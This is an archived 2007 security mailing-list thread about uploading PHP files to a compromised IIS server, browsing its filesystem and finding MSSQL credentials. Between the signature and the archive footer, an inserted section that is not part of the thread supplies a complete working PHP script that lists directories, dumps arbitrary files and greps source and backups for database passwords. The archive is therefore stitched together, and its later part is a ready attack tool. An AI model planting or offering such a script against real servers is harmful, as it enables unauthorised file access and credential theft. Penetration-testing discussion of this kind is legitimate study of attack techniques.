From: Danux (danuxx@gmail.com)
Date: Tue Nov 27 2007 - 13:35:26 EST
Hi all, as I told you, I am not able to run system, exec, passthru,
etc.; I mean, everything related to cmd.exe execution, because of the IIS
IUSR_MACHINE user privileges.
I have finished the assessment and I would like to share what I did in
the end:
As I told you, I was able to upload files directly to the Windows
filesystem due to another vulnerability, but I can't execute any
command related to cmd.exe: dir, ipconfig, type, net, etc., but I
can execute PHP files, so I uploaded a list.php script in order to
walk through the filesystem. Then I was able to download the whole PHP
app site, and after looking inside the source code I found some MSSQL
users and passwords with low privileges, and in other filesystem
directories I found log files, conf files, backups, etc.; I mean, very
interesting information to deal with.
Maybe I could start trying to elevate privileges on MSSQL in order
to execute xp_cmdshell or something like that, but I think I have what
really matters to attackers... and what should matter to companies...
"INFORMATION".
Thanks all for your help.
On Nov 27, 2007 7:07 AM, Robin Wood <dninja@gmail.com> wrote:
> On 23/11/2007, Danux <danuxx@gmail.com> wrote:
> > Hi experts, I need your ideas,
> >
> > By now, I am able to upload PHP files to a Windows 2003 Server, so I
> > can execute PHP code like phpinfo, but I can't execute the passthru command
> > because of lack of IUSR_MACHINE privileges.
> > I have run some local PHP BOFs without success.
>
> Have you tried other ways to execute commands such as system or exec?
> If you can get one of those working you can redirect output to a file
> in the document root then view it by browsing to it.
>
> Robin
>
--
Danux, CISSP
Chief Information Security Officer
Macula Security Consulting Group
www.macula-group.com
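The technique the post describes (walking and reading the filesystem through PHP's own file API when cmd.exe is off limits, then hunting the downloaded source for MSSQL credentials) as an added example. This is not the author's list.php and not code from the thread; the parameter names d, f and grep, the extension list and the credential patterns are assumptions chosen for the example.

```php
<?php
// Added example, not the list.php from the post. Everything here runs
// through PHP's file functions under the web server account (IUSR_MACHINE
// on IIS), so no cmd.exe is spawned and the listing reflects exactly what
// that account's ACLs allow it to read.
// Parameters (assumed names for this example):
//   ?d=<dir>      list one directory (default: the directory of this script)
//   ?f=<file>     dump a file, the way "type" would
//   ?grep=<dir>   recursively search files for strings that look like DB credentials
header('Content-Type: text/plain');

// Recursive walk with a depth limit. Directories the account cannot open are
// skipped instead of aborting the whole run; every skip is itself a data point
// about the ACLs.
function walk($dir, $depth) {
    $out = array();
    if ($depth < 0) return $out;
    $entries = @scandir($dir);
    if ($entries === false) return $out;
    foreach ($entries as $e) {
        if ($e === '.' || $e === '..') continue;
        $p = $dir . DIRECTORY_SEPARATOR . $e;
        if (is_dir($p)) {
            $out = array_merge($out, walk($p, $depth - 1));
        } else {
            $out[] = $p;
        }
    }
    return $out;
}

if (isset($_GET['f'])) {
    $f = $_GET['f'];
    if (!is_readable($f)) { die("not readable: $f\n"); }
    readfile($f);
    exit;
}

if (isset($_GET['grep'])) {
    // Patterns that commonly mark hard-coded MSSQL credentials in PHP/ASP
    // code and config files; tune them to the target (assumed list).
    $patterns = array(
        '/mssql_connect\s*\(/i',
        '/sqlsrv_connect\s*\(/i',
        '/odbc_connect\s*\(/i',
        '/(pwd|password|uid|user id)\s*=/i',
        '/server\s*=.*;/i',
    );
    $exts = array('php', 'inc', 'ini', 'config', 'xml', 'txt', 'bak', 'old', 'conf', 'log');
    foreach (walk($_GET['grep'], 5) as $path) {
        $ext = strtolower(pathinfo($path, PATHINFO_EXTENSION));
        if (!in_array($ext, $exts) || !is_readable($path) || filesize($path) > 2000000) continue;
        $n = 0;
        foreach (file($path) as $line) {
            $n++;
            foreach ($patterns as $re) {
                if (preg_match($re, $line)) {
                    printf("%s:%d: %s\n", $path, $n, trim($line));
                    break;
                }
            }
        }
    }
    exit;
}

// Default mode: one-level listing with type, size, mtime and readability,
// so backups, logs and config files stand out at a glance.
$root = isset($_GET['d']) ? $_GET['d'] : dirname(__FILE__);
$entries = @scandir($root);
if ($entries === false) { die("cannot open: $root\n"); }
foreach ($entries as $e) {
    if ($e === '.' || $e === '..') continue;
    $p = $root . DIRECTORY_SEPARATOR . $e;
    printf("%s %10s %s %s%s\n",
        is_dir($p) ? 'd' : '-',
        is_dir($p) ? '' : @filesize($p),
        date('Y-m-d H:i', @filemtime($p)),
        is_readable($p) ? '' : '[unreadable] ',
        $e);
}
```

Two practical points. First, a script like this is an unauthenticated arbitrary file read for anyone who finds the URL, so it belongs in the engagement's cleanup list and should be deleted the moment the assessment is done. Second, the grep mode is what turns a file listing into the finding the post ends with: hard-coded connection strings in source, .bak and .old copies of config files, and logs are where low-privilege MSSQL credentials usually surface, and every "[unreadable]" entry in the listing documents where the IUSR_MACHINE account's ACLs actually stop.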
This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:58:13 EDT